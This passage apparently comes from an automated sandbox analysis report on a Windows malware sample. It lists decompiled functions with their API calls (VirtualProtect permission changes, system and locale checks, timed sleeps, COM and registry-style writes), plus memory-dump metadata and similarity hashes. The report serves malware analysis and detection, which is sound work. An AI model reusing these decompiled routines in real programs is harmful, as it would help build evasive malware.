                      								_t55 = E02BD1D8A(0, _t56, _t62, _t64, 0x2bda00c);
                      								__eflags = _t55;
                      								if(_t55 != 0) {
                      									goto L30;
                      								}
                      								_t44 = E02BD6EA3(_t62);
                      								__eflags = _t44;
                      								if(_t44 != 0) {
                      									__eflags = _v8;
                      									_t68 = _v12;
                      									if(_v8 != 0) {
                      										L29:
                      										_t45 = E02BD6815(_t62, _t68, _v8); // executed
                      										_t55 = _t45;
                      										goto L30;
                      									}
                      									__eflags = _t68;
                      									if(__eflags == 0) {
                      										goto L30;
                      									}
                      									_t55 = E02BD5C31(__eflags,  &(_t68[4]));
                      									__eflags = _t55;
                      									if(_t55 == 0) {
                      										goto L30;
                      									}
                      									goto L29;
                      								}
                      								_t55 = 8;
                      							}
                      						}
                      					} else {
                      						_t69 = _v12;
                      						if(_t69 == 0) {
                      							L30:
                      							if(_v16 == 0 || _v16 == 1) {
                      								 *0x2bda17c();
                      							}
                      							goto L34;
                      						}
                      						_t70 =  &(_t69[4]);
                      						do {
                      						} while (E02BD23C4(_t64, _t70, 0, 1) == 0x4c7);
                      					}
                      					goto L30;
                      				} else {
                      					_t55 = _t22;
                      					L34:
                      					return _t55;
                      				}
                      			}

                      APIs
                        • Part of subcall function 02BD4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,02BD253B,00000001), ref: 02BD452F
                      • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02BD25B8
                        • Part of subcall function 02BD27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 02BD27C4
                        • Part of subcall function 02BD27A0: wsprintfA.USER32 ref: 02BD2828
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • memset.NTDLL ref: 02BD2612
                      • RtlInitializeCriticalSection.NTDLL(035B95C0), ref: 02BD2623
                        • Part of subcall function 02BD5C31: memset.NTDLL ref: 02BD5C4B
                        • Part of subcall function 02BD5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02BD5C91
                        • Part of subcall function 02BD5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02BD5C9C
                      • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02BD264E
                      • wsprintfA.USER32 ref: 02BD267E
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
                      • String ID:
                      • API String ID: 1825273115-0
                      • Opcode ID: bdc7ccbe3433294f938863022eb368e80c7ff422e0d854e57b630d8dc34fc355
                      • Instruction ID: 5c1f42ae1e5a5bf40cae456cb5ca2cedae0e34a8e272a09a1a620ad9dfcd9b90
                      • Opcode Fuzzy Hash: bdc7ccbe3433294f938863022eb368e80c7ff422e0d854e57b630d8dc34fc355
                      • Instruction Fuzzy Hash: 18514571E82354ABDB20ABA4DCA4FEE37B8FB04754F0488E5E901E7182F77099408F50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			_entry_() {
                      				void* _t1;
                      				int _t4;
                      				int _t6;
                      
                      				_t6 = 0;
                      				_t1 = HeapCreate(0, 0x400000, 0); // executed
                      				 *0x404160 = _t1;
                      				if(_t1 != 0) {
                      					 *0x404170 = GetModuleHandleA(0);
                      					GetCommandLineW(); // executed
                      					_t4 = E004019F1(); // executed
                      					_t6 = _t4;
                      					HeapDestroy( *0x404160);
                      				}
                      				ExitProcess(_t6);
                      			}

                      APIs
                      • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401DEB
                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
                      • GetCommandLineW.KERNEL32 ref: 00401E06
                        • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                        • Part of subcall function 004019F1: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                        • Part of subcall function 004019F1: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                        • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                        • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                        • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
                        • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
                      • HeapDestroy.KERNEL32 ref: 00401E19
                      • ExitProcess.KERNEL32 ref: 00401E20
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                      • String ID:
                      • API String ID: 1863574965-0
                      • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                      • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
                      • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                      • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD5251(void* __edx) {
                      				void* _v8;
                      				int _v12;
                      				WCHAR* _v16;
                      				void* __edi;
                      				void* __esi;
                      				void* _t23;
                      				intOrPtr _t24;
                      				void* _t26;
                      				intOrPtr _t32;
                      				intOrPtr _t35;
                      				void* _t37;
                      				intOrPtr _t38;
                      				intOrPtr _t42;
                      				void* _t45;
                      				void* _t50;
                      				void* _t52;
                      
                      				_t50 = __edx;
                      				_v12 = 0;
                      				_t23 = E02BD6ADC(0,  &_v8); // executed
                      				if(_t23 != 0) {
                      					_v8 = 0;
                      				}
                      				_t24 =  *0x2bda348; // 0x9dd5a8
                      				_t4 = _t24 + 0x2bdbc70; // 0x35b9218
                      				_t5 = _t24 + 0x2bdbb60; // 0x4f0053
                      				_t26 = E02BD33F1( &_v16, _v8, _t5, _t4); // executed
                      				_t45 = _t26;
                      				if(_t45 == 0) {
                      					StrToIntExW(_v16, 0,  &_v12);
                      					_t45 = 8;
                      					if(_v12 < _t45) {
                      						_t45 = 1;
                      						__eflags = 1;
                      					} else {
                      						_t32 =  *0x2bda348; // 0x9dd5a8
                      						_t11 = _t32 + 0x2bdbcc8; // 0x35b9270
                      						_t48 = _t11;
                      						_t12 = _t32 + 0x2bdbb60; // 0x4f0053
                      						_t52 = E02BD5DE4(_t11, _t12, _t11);
                      						_t59 = _t52;
                      						if(_t52 != 0) {
                      							_t35 =  *0x2bda348; // 0x9dd5a8
                      							_t13 = _t35 + 0x2bdbcf0; // 0x30314549
                      							_t37 = E02BD5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                      							if(_t37 == 0) {
                      								_t61 =  *0x2bda2fc - 6;
                      								if( *0x2bda2fc <= 6) {
                      									_t42 =  *0x2bda348; // 0x9dd5a8
                      									_t15 = _t42 + 0x2bdbcd2; // 0x52384549
                      									E02BD5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                      								}
                      							}
                      							_t38 =  *0x2bda348; // 0x9dd5a8
                      							_t17 = _t38 + 0x2bdbbb8; // 0x35b9160
                      							_t18 = _t38 + 0x2bdbc1c; // 0x680043
                      							_t45 = E02BD5B0E(_v8, 0x80000001, _t52, _t18, _t17);
                      							HeapFree( *0x2bda2d8, 0, _t52);
                      						}
                      					}
                      					HeapFree( *0x2bda2d8, 0, _v16);
                      				}
                      				_t54 = _v8;
                      				if(_v8 != 0) {
                      					E02BD7220(_t54);
                      				}
                      				return _t45;
                      			}

                      APIs
                      • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,035B9218,00000000,?,7476F710,00000000,7476F730), ref: 02BD52A0
                      • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,035B9160,?,00000000,30314549,00000014,004F0053,035B9270), ref: 02BD533D
                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD68B6), ref: 02BD534F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID: Uqt
                      • API String ID: 3298025750-2320327147
                      • Opcode ID: 6698f6ea7520c4a9a6aa749dcdef7b02c303878c150521f2fa27aeba55045ca5
                      • Instruction ID: 447b6d3a025cd40f4f9e9b0550f6bcb37fd966e12b7f3df1f8b1ce3c5bc85d72
                      • Opcode Fuzzy Hash: 6698f6ea7520c4a9a6aa749dcdef7b02c303878c150521f2fa27aeba55045ca5
                      • Instruction Fuzzy Hash: 9931DF31901209BFCB20DB91DC84EDE3BBDEB04754F5640A9E501AB160FBB19A54DF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SysAllocString.OLEAUT32(80000002), ref: 02BD43B5
                      • SysAllocString.OLEAUT32(02BD4D42), ref: 02BD43F9
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD440D
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD441B
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: String$AllocFree
                      • String ID:
                      • API String ID: 344208780-0
                      • Opcode ID: e165a60a82a389e901214fae263ab319957ea08edd53db270dc71f4341659f77
                      • Instruction ID: 8931b978915f34dd9874c32a03bf34993fa9208fe42fc47638254e6e580ea041
                      • Opcode Fuzzy Hash: e165a60a82a389e901214fae263ab319957ea08edd53db270dc71f4341659f77
                      • Instruction Fuzzy Hash: C6312C76900209AFCB00CF98D4D09EE7BB9FF08354B15846EF906D7250EB70A681CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 65%
                      			E02BD213E(void* __ecx, intOrPtr _a4) {
                      				struct _FILETIME _v12;
                      				int _t13;
                      				signed int _t16;
                      				void* _t17;
                      				signed int _t18;
                      				unsigned int _t22;
                      				void* _t30;
                      				signed int _t34;
                      
                      				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                      				asm("stosd");
                      				do {
                      					_t13 = SwitchToThread();
                      					GetSystemTimeAsFileTime( &_v12);
                      					_t22 = _v12.dwHighDateTime;
                      					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                      					_push(0);
                      					_push(0x13);
                      					_push(_t22 >> 5);
                      					_push(_t16);
                      					L02BD8436();
                      					_t34 = _t16 + _t13;
                      					_t17 = E02BD6269(_a4, _t34);
                      					_t30 = _t17;
                      					_t18 = 3;
                      					Sleep(_t18 << (_t34 & 0x00000007)); // executed
                      				} while (_t30 == 1);
                      				return _t30;
                      			}

                      APIs
                      • SwitchToThread.KERNEL32(?,00000001,?,?,?,02BD5044,?,?), ref: 02BD214F
                      • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02BD5044,?,?), ref: 02BD215B
                      • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02BD2174
                        • Part of subcall function 02BD6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02BD6308
                      • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02BD5044,?,?), ref: 02BD2193
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                      • String ID:
                      • API String ID: 1610602887-0
                      • Opcode ID: 49c55abeaf28c2259e47edf5ed7712cc26528df9a93d591098c6cb3e50e7d1f6
                      • Instruction ID: 9063cd8135808dc51f9630d59c100195a6e5fcdd531db28b9b2c6f9f60b5bb0f
                      • Opcode Fuzzy Hash: 49c55abeaf28c2259e47edf5ed7712cc26528df9a93d591098c6cb3e50e7d1f6
                      • Instruction Fuzzy Hash: 46F0A477B406047BD7149AA4DC19BDF76B9DB843A1F540564E601E7340F6B49A018A90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD5157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                      				struct _FILETIME _v12;
                      				void* _t11;
                      				short _t19;
                      				void* _t21;
                      				void* _t22;
                      				void* _t24;
                      				void* _t25;
                      				short* _t26;
                      
                      				_t24 = __edx;
                      				_t25 = E02BD6536(_t11, _a12);
                      				if(_t25 == 0) {
                      					_t22 = 8;
                      				} else {
                      					_t26 = _t25 + _a16 * 2;
                      					 *_t26 = 0;
                      					_t22 = E02BD330E(__ecx, _a4, _a8, _t25);
                      					if(_t22 == 0) {
                      						GetSystemTimeAsFileTime( &_v12);
                      						_t19 = 0x5f;
                      						 *_t26 = _t19;
                      						_t21 = E02BD7767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
                      						_t22 = _t21;
                      					}
                      					HeapFree( *0x2bda2d8, 0, _t25);
                      				}
                      				return _t22;
                      			}

                      APIs
                        • Part of subcall function 02BD6536: lstrlen.KERNEL32(?,00000000,035B9E40,00000000,02BD6F0A,035BA063,43175AC3,?,?,?,?,43175AC3,00000005,02BDA00C,4D283A53,?), ref: 02BD653D
                        • Part of subcall function 02BD6536: mbstowcs.NTDLL ref: 02BD6566
                        • Part of subcall function 02BD6536: memset.NTDLL ref: 02BD6578
                      • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,035B9270), ref: 02BD518F
                      • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,035B9270), ref: 02BD51BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                      • String ID: Uqt
                      • API String ID: 1500278894-2320327147
                      • Opcode ID: 25d5068065cc0ecb20ba138d8633dc5517f28ccb9814c44a76246ec1b7578b1a
                      • Instruction ID: 2e0495214699ecd55f79da1ef0e3808296c7b808767ee9d516e606e81aaf3d78
                      • Opcode Fuzzy Hash: 25d5068065cc0ecb20ba138d8633dc5517f28ccb9814c44a76246ec1b7578b1a
                      • Instruction Fuzzy Hash: 7701BC36200209BBDB215FA5AC44FEA7BB9EF84754F404469FA009A160EA72C864CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E004014CF(void* __eax, void* _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				long _v20;
                      				int _t42;
                      				long _t53;
                      				intOrPtr _t56;
                      				void* _t57;
                      				signed int _t59;
                      
                      				_v12 = _v12 & 0x00000000;
                      				_t56 =  *0x404180;
                      				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                      				_v16 =  *(__eax + 6) & 0x0000ffff;
                      				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
                      				_v8 = _v8 & 0x00000000;
                      				if(_v16 <= 0) {
                      					L12:
                      					return _v12;
                      				} else {
                      					goto L1;
                      				}
                      				while(1) {
                      					L1:
                      					_t59 = _v12;
                      					if(_t59 != 0) {
                      						goto L12;
                      					}
                      					asm("bt [esi+0x24], eax");
                      					if(_t59 >= 0) {
                      						asm("bt [esi+0x24], eax");
                      						if(__eflags >= 0) {
                      							L8:
                      							_t53 = _t56 - 0x43175abf;
                      							L9:
                      							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
                      							if(_t42 == 0) {
                      								_v12 = GetLastError();
                      							}
                      							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
                      							_v8 = _v8 + 1;
                      							if(_v8 < _v16) {
                      								continue;
                      							} else {
                      								goto L12;
                      							}
                      						}
                      						asm("bt [esi+0x24], eax");
                      						_t53 = _t56 - 0x43175ac1;
                      						if(__eflags >= 0) {
                      							goto L9;
                      						}
                      						goto L8;
                      					}
                      					asm("bt [esi+0x24], eax");
                      					if(_t59 >= 0) {
                      						_t53 = _t56 - 0x43175aa3;
                      					} else {
                      						_t53 = _t56 - 0x43175a83;
                      					}
                      					goto L9;
                      				}
                      				goto L12;
                      			}

                      APIs
                      • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                      • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
                      • GetLastError.KERNEL32 ref: 00401583
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: ProtectVirtual$ErrorLast
                      • String ID:
                      • API String ID: 1469625949-0
                      • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                      • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
                      • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                      • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD61DA(void* _a4) {
                      				char _t2;
                      
                      				_t2 = RtlFreeHeap( *0x2bda2d8, 0, _a4); // executed
                      				return _t2;
                      			}

                      APIs
                      • RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID: Uqt
                      • API String ID: 3298025750-2320327147
                      • Opcode ID: ba1ce741bea9028a5d7bf5c7ab9544f5fd4e11c4d27862acf4b63f54cd31c887
                      • Instruction ID: cff382a3dabe14ce96ff36e29e1f9945d1f267d2033be7286daa6878d93ce199
                      • Opcode Fuzzy Hash: ba1ce741bea9028a5d7bf5c7ab9544f5fd4e11c4d27862acf4b63f54cd31c887
                      • Instruction Fuzzy Hash: 94B01271981200ABCF114B01EE14F457A21A750740F104810B348D107492320430FB15
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 02199F86
                      • VirtualProtect.KERNEL32(?,?,00000000), ref: 0219A1D0
                      Memory Dump Source
                      • Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2190000_server.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                      • Instruction ID: f194941db022107fdb29dd3d95bb131cd2e58fdaafdeff1a356ede1e90fae2fc
                      • Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                      • Instruction Fuzzy Hash: F1B198B5A00209DFCB08CF88C895EAEBBB6BF88314F148159E9099B355D735E985CFD4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E02BD790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                      				void* _v8;
                      				void* __esi;
                      				intOrPtr* _t35;
                      				void* _t40;
                      				intOrPtr* _t41;
                      				intOrPtr* _t43;
                      				intOrPtr* _t45;
                      				intOrPtr* _t50;
                      				intOrPtr* _t52;
                      				void* _t54;
                      				intOrPtr* _t55;
                      				intOrPtr* _t57;
                      				intOrPtr* _t61;
                      				intOrPtr* _t65;
                      				intOrPtr _t68;
                      				void* _t72;
                      				void* _t75;
                      				void* _t76;
                      
                      				_t55 = _a4;
                      				_t35 =  *((intOrPtr*)(_t55 + 4));
                      				_a4 = 0;
                      				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                      				if(_t76 < 0) {
                      					L18:
                      					return _t76;
                      				}
                      				_t40 = E02BD4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                      				_t76 = _t40;
                      				if(_t76 >= 0) {
                      					_t61 = _a28;
                      					if(_t61 != 0 &&  *_t61 != 0) {
                      						_t52 = _v8;
                      						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                      					}
                      					if(_t76 >= 0) {
                      						_t43 =  *_t55;
                      						_t68 =  *0x2bda348; // 0x9dd5a8
                      						_t20 = _t68 + 0x2bdb270; // 0x740053
                      						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                      						if(_t76 >= 0) {
                      							_t76 = E02BD4984(_a4);
                      							if(_t76 >= 0) {
                      								_t65 = _a28;
                      								if(_t65 != 0 &&  *_t65 == 0) {
                      									_t50 = _a4;
                      									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                      								}
                      							}
                      						}
                      						_t45 = _a4;
                      						if(_t45 != 0) {
                      							 *((intOrPtr*)( *_t45 + 8))(_t45);
                      						}
                      						_t57 = __imp__#6;
                      						if(_a20 != 0) {
                      							 *_t57(_a20);
                      						}
                      						if(_a12 != 0) {
                      							 *_t57(_a12);
                      						}
                      					}
                      				}
                      				_t41 = _v8;
                      				 *((intOrPtr*)( *_t41 + 8))(_t41);
                      				goto L18;
                      			}

                      APIs
                        • Part of subcall function 02BD4358: SysAllocString.OLEAUT32(80000002), ref: 02BD43B5
                        • Part of subcall function 02BD4358: SysFreeString.OLEAUT32(00000000), ref: 02BD441B
                      • SysFreeString.OLEAUT32(?), ref: 02BD79EA
                      • SysFreeString.OLEAUT32(02BD4D42), ref: 02BD79F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: String$Free$Alloc
                      • String ID:
                      • API String ID: 986138563-0
                      • Opcode ID: 039e4950f5904ee94e7b880017c0fc3fa569ce6188e07473e91c68f3656497ea
                      • Instruction ID: b4fe21f3687a858281b348b2ccf1c736fc3893a784e2a6f0da0334ef61d10cb1
                      • Opcode Fuzzy Hash: 039e4950f5904ee94e7b880017c0fc3fa569ce6188e07473e91c68f3656497ea
                      • Instruction Fuzzy Hash: B2316932500148BFCF11DFA8C888CDBBB7AFBC97447144698F9059B214E7369D91DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040139F() {
                      				char _v16;
                      				intOrPtr _v28;
                      				void _v32;
                      				void* _v36;
                      				intOrPtr _t15;
                      				void* _t16;
                      				void* _t24;
                      				long _t25;
                      				int _t26;
                      				void* _t30;
                      				intOrPtr* _t32;
                      				signed int _t35;
                      				intOrPtr _t38;
                      
                      				_t15 =  *0x404184;
                      				if( *0x40416c > 5) {
                      					_t16 = _t15 + 0x40513c;
                      				} else {
                      					_t16 = _t15 + 0x40529c;
                      				}
                      				E00401D3C(_t16, _t16);
                      				_t35 = 6;
                      				memset( &_v32, 0, _t35 << 2);
                      				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
                      				if(_t24 == 0) {
                      					_t25 = 0xb;
                      				} else {
                      					_t26 = lstrlenW( *0x404178);
                      					_t8 = _t26 + 2; // 0x2
                      					_t11 = _t26 + _t8 + 8; // 0xa
                      					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
                      					if(_t30 == 0) {
                      						_t32 = _v36;
                      						 *_t32 = 0;
                      						if( *0x404178 == 0) {
                      							 *((short*)(_t32 + 4)) = 0;
                      						} else {
                      							L00401FE6(_t32 + 4);
                      						}
                      					}
                      					_t25 = E004012FB(_v28); // executed
                      				}
                      				ExitThread(_t25);
                      			}

                      0x004013a5
                      0x004013b6
                      0x004013c0
                      0x004013b8
                      0x004013b8
                      0x004013b8
                      0x004013c7
                      0x004013d0
                      0x004013d5
                      0x004013ec
                      0x004013f3
                      0x00401450
                      0x004013f5
                      0x004013fb
                      0x00401401
                      0x0040140f
                      0x00401413
                      0x0040141a
                      0x00401422
                      0x00401426
                      0x0040142e
                      0x0040143f
                      0x00401430
                      0x00401436
                      0x00401436
                      0x0040142e
                      0x00401447
                      0x00401447
                      0x00401452

                      APIs
                      Memory Dump Source
